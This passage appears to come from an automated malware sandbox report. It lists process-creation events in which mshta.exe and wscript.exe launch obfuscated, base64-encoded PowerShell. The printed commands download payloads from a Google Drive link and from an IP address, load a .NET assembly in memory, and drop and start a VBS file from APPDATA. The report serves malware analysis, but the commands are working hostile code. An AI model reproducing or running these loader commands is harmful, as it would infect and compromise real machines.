([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFICh